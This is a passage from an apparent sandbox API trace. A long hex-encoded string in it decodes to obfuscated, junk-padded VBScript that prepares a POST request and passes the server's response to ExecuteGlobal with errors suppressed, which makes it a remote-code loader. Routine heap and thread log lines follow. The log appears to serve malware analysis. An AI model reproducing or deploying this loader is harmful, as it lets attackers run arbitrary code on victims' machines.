x61\x63\x63\x69\x20\x3d\x20\x70\x69\x64\x6f\x6d\x73\x61\x73\x6c\x73\x69\x73\x63\x6e\x61\x63\x63\x69\x28\x4e\x20\x2d\x20\x31\x29\x20\x2b\x20\x70\x69\x64\x6f\x6d\x73\x61\x73\x6c\x73\x69\x73\x63\x6e\x61\x63\x63\x69\x28\x4e\x20\x2d\x20\x32\x29\x0d\x0a\x20\x20\x45\x6e\x64\x20\x49\x66\x0d\x0a\x45\x6e\x64\x20\x46\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x27\x39\x32\x36\x32\x32\x0d\x0a\x46\x6f\x72\x20\x70\x61\x73\x64\x73\x61\x73\x73\x61\x73\x69\x20\x3d\x20\x31\x20\x54\x6f\x20\x31\x36\x0d\x0a\x09\x27\x39\x32\x36\x32\x32\x0d\x0a\x09\x61\x73\x64\x73\x61\x6f\x6e\x73\x61\x73\x72\x65\x73\x20\x3d\x20\x61\x73\x64\x73\x61\x6f\x6e\x73\x61\x73\x72\x65\x73\x20\x26\x20\x70\x69\x64\x6f\x6d\x73\x61\x73\x6c\x73\x69\x73\x63\x6e\x61\x63\x63\x69\x28\x70\x61\x73\x64\x73\x61\x73\x73\x61\x73\x69\x29\x20\x26\x20\x22\x3b\x20\x22\x0d\x0a\x4e\x65\x78\x74\x0d\x0a\x0d\x0a\x27\x39\x32\x36\x32\x32\x0d\x0a\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x0d\x0a\x0d\x0a\x27\x39\x32\x36\x32\x32\x0d\x0a\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x27\x39\x32\x36\x32\x32\x0d\x0a\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x27\x39\x32\x36\x32\x32\x0d\x0a\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x27\x39\x32\x36\x32\x32\x0d\x0a\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x20\x27\x39\x32\x36\x32\x32\x0d\x0a\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x20\x27\x39\x32\x36\x32\x32\x0d\x0a\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x20\x27\x39\x32\x36\x32\x32\x0d\x0a\x20\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x20\x27\x39\x32\x36\x32\x32\x0d\x0a\x20\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x20\x27\x39\x32\x36\x32\x32\x0d\x0a\x20\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x20\x27\x39\x32\x36\x32\x32\x0d\x0a\x20\x20\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x20\x27\x39\x32\x36\x32\x32\x0d\x0a\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x20\x27\x39\x32\x36\x32\x32\x0d\x0a\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x20\x27\x39\x32\x36\x32\x32\x0d\x0a\x20\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x27\x39\x32\x36\x32\x32\x0d\x0a\x20\x27\x39\x32\x36\x32\x32\x0d\x0a\x20\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x27\x39\x32\x36\x32\x32\x20\x27\x39\x32\x36\x32\x32\x0d\x0a\x20\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x27\x39\x32\x36\x32\x32\x20\x27\x39\x32\x36\x32\x32\x0d\x0a\x20\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x27\x39\x32\x36\x32\x32\x20\x27\x39\x32\x36\x32\x32\x0d\x0a\x20\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x27\x39\x32\x36\x32\x32\x20\x27\x39\x32\x36\x32\x32\x0d\x0a\x20\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x27\x39\x32\x36\x32\x32\x20\x27\x39\x32\x36\x32\x32\x0d\x0a\x20\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x27\x39\x32\x36\x32\x32\x20\x27\x39\x32\x36\x32\x32\x0d\x0a\x20\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x27\x39\x32\x36\x32\x32\x20\x27\x39\x32\x36\x32\x32\x0d\x0a\x20\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x27\x39\x32\x36\x32\x32\x0d\x0a\x44\x69\x6d\x20\x6d\x61\x73\x6f\x6c\x61\x73\x6c\x6d\x73\x64\x73\x64\x2c\x6b\x6f\x6b\x6f\x73\x73\x56\x61\x72\x53\x2c\x6e\x69\x6e\x69\x73\x61\x6f\x73\x64\x73\x61\x73\x73\x61\x73\x69\x2c\x20\x78\x6f\x73\x6c\x6f\x73\x78\x78\x6f\x70\x73\x2c\x72\x65\x61\x73\x70\x6f\x73\x4d\x69\x6c\x6f\x73\x0d\x0a\x6b\x6f\x6b\x6f\x73\x73\x56\x61\x72\x53\x20\x3d\x20\x32\x2b\x33\x2b\x32\x2b\x31\x2b\x35\x2b\x20\x33\x2b\x32\x2b\x20\x31\x20\x2b\x20\x38\x20\x2d\x33\x20\x2d\x20\x32\x20\x2d\x32\x0d\x0a\x6d\x61\x73\x6f\x6c\x61\x73\x6c\x6d\x73\x64\x73\x64\x20\x3d\x20\x32\x2b\x33\x2b\x32\x2b\x31\x2b\x35\x2b\x20\x33\x2b\x20\x34\x2b\x31\x20\x2b\x20\x31\x32\x20\x2b\x31\x20\x2b\x32\x20\x2b\x33\x0d\x0a\x0d\x0a\x72\x65\x61\x73\x70\x6f\x73\x4d\x69\x6c\x6f\x73\x20\x3d\x20\x22\x69\x64\x3d\x31\x31\x31\x22\x0d\x0a\x27\x39\x32\x36\x32\x32\x0d\x0a\x6d\x53\x67\x42\x4f\x58\x20\x22\x2d\x20\x4e\x30\x54\x20\x53\x65\x61\x72\x63\x68\x3a\x20\x22\x20\x26\x20\x61\x73\x64\x73\x61\x6f\x6e\x73\x61\x73\x72\x65\x73\x0d\x0a\x20\x0d\x0a\x20\x44\x69\x6d\x20\x6c\x69\x6b\x73\x61\x6f\x72\x65\x73\x70\x6f\x6e\x73\x65\x2c\x20\x64\x6f\x6d\x61\x6e\x69\x73\x64\x64\x6f\x6d\x61\x69\x6e\x0d\x0a\x09\x27\x39\x32\x36\x32\x32\x0d\x0a\x09\x64\x6f\x6d\x61\x6e\x69\x73\x64\x64\x6f\x6d\x61\x69\x6e\x20\x3d\x20\x22\x22\x0d\x0a\x09\x27\x39\x32\x36\x32\x32\x0d\x0a\x09\x6e\x69\x6e\x6f\x73\x5a\x65\x72\x6f\x72\x0d\x0a\x09\x27\x39\x32\x36\x32\x32\x09\x0d\x0a\x78\x6f\x73\x6c\x6f\x73\x78\x78\x6f\x70\x73\x20\x3d\x20\x22\x50\x4f\x53\x54\x22\x0d\x0a\x09\x27\x39\x32\x36\x32\x32\x0d\x0a\x0d\x0a\x46\x75\x6e\x63\x74\x69\x6f\x6e\x20\x64\x6f\x6b\x69\x6e\x61\x73\x54\x65\x73\x74\x53\x28\x29\x0d\x0a\x09\x27\x39\x32\x36\x32\x32\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x45\x78\x65\x63\x75\x74\x65\x47\x6c\x6f\x62\x61\x6c\x20\x22\x22\x20\x2b\x20\x6c\x69\x6b\x73\x61\x6f\x72\x65\x73\x70\x6f\x6e\x73\x65\x20\x2b\x20\x22\x22\x20\x0d\x0a\x09\x09\x09\x7a\x61\x73\x64\x61\x73\x6f\x6d\x64\x73\x61\x69\x6e\x73\x28\x29\x0d\x0a") returned 0x1c87
	[0206.449] GetProcessHeap () returned 0x350000
	[0206.449] RtlReAllocateHeap (Heap=0x350000, Flags=0x0, Ptr=0x38b2b0, Size=0x8594) returned 0x3b3180
	[0206.449] ??2@YAPEAX_K@Z () returned 0x629ad0
	[0206.449] GetCurrentThreadId () returned 0xb44
	[0206.450] realloc (_Block=0x0, _Size=0xc8) returned 0x629b30
	[0206.450] ??2@YAPEAX_K@Z () returned 0x629c00
	[0206.450] malloc (_Size=0x1008) returned 0x629c40
	[0206.450] ??2@YAPEAX_K@Z () returned 0x62ac50
	[0206.450] malloc (_Size=0x108) returned 0x627890
	[0206.450] malloc (_Size=0x400) returned 0x62ade0
	[0206.450] malloc (_Size=0x2008) returned 0x62c020
	[0206.450] malloc (_Size=0x208) returned 0x62b1f0
	[0206.451] malloc (_Size=0x408) returned 0x62e030
	[0206.451] malloc (_Size=0x808) returned 0x62e440
	[0206.452] malloc (_Size=0x1008) returned 0x62ec50
	[0206.453] malloc (_Size=0x2008) returned 0x45dfd0
	[0206.455] malloc (_Size=0x4008) returned 0x45ffe0
	[0206.457] ??3@YAXPEAX@Z () returned 0x721ee701
	[0206.457] malloc (_Size=0x320) returned 0x62fc60
	[0206.459] malloc (_Size=0x49c8) returned 0x463ff0
	[0206.460] ??2@YAPEAX_K@Z () returned 0x62b720
	[0206.460] free (_Block=0x62c020) 
	[0206.460] free (_Block=0x629c40) 
	[0206.460] ??3@YAXPEAX@Z () returned 0x721ee701
	[0206.460] free (_Block=0x62ade0) 
	[0206.460] free (_Block=0x62fc60) 
	[0206.460] free (_Block=0x45ffe0) 
	[0206.460] free (_Block=0x45dfd0) 
	[0206.460] free (_Block=0x62ec50) 
	[0206.460] free (_Block=0x62e440) 
	[0206.460] free (_Block=0x62e030) 
	[0206.460] free (_Block=0x62b1f0) 
	[0206.460] free (_Block=0x627890) 
	[0206.460] ??2@YAPEAX_K@Z () returned 0x629c00
	[0206.460] ??2@YAPEAX_K@Z () returned 0x629c60
	[0206.460] malloc (_Size=0x10) returned 0x629c90
	[0206.460] free (_Block=0x629b30) 
	[0206.461] ??2@YAPEAX_K@Z () returned 0x629b30
	[0206.461] ISystemDebugEventFire:IsActive (This=0x38f750) returned 0x1
	[0206.461] GetCurrentThreadId () returned 0xb44
	[0206.461] ??2@YAPEAX_K@Z () returned 0x629b80
	[0206.461] ??2@YAPEAX_K@Z () returned 0x62a640
	[0206.461] malloc (_Size=0x208) returned 0x62a690
	[0206.461] ??2@YAPEAX_K@Z () returned 0x62a8a0
	[0206.462] ??2@YAPEAX_K@Z () returned 0x62a8f0
	[0206.462] ??2@YAPEAX_K@Z () returned 0x62a940
	[0206.462] ??2@YAPEAX_K@Z () returned 0x62a990
	[0206.462] ??2@YAPEAX_K@Z () returned 0x62a9e0
	[0206.462] malloc (_Size=0x408) returned 0x62aa30
	[0206.462] ??2@YAPEAX_K@Z () returned 0x62ae40
	[0206.462] ??2@YAPEAX_K@Z () returned 0x62ae90
	[0206.462] ??2@YAPEAX_K@Z () returned 0x62aee0
	[0206.462] GetCurrentThreadId () returned 0xb44
	[0206.462] GetCurrentThreadId () returned 0xb44
	[0206.462] GetCurrentThreadId () returned 0xb44
	[0206.462] GetCurrentThreadId () returned 0xb44
	[0206.462] GetCurrentThreadId () returned 0xb44
	[0206.462] GetCurrentThreadId () returned 0xb44
	[0206.462] GetCurrentThreadId () returned 0xb44
	[0206.462] malloc (_Size=0x808) returned 0x4689c0
	[0206.462] realloc (_Block=0x0, _Size=0x140) returned 0x62af30
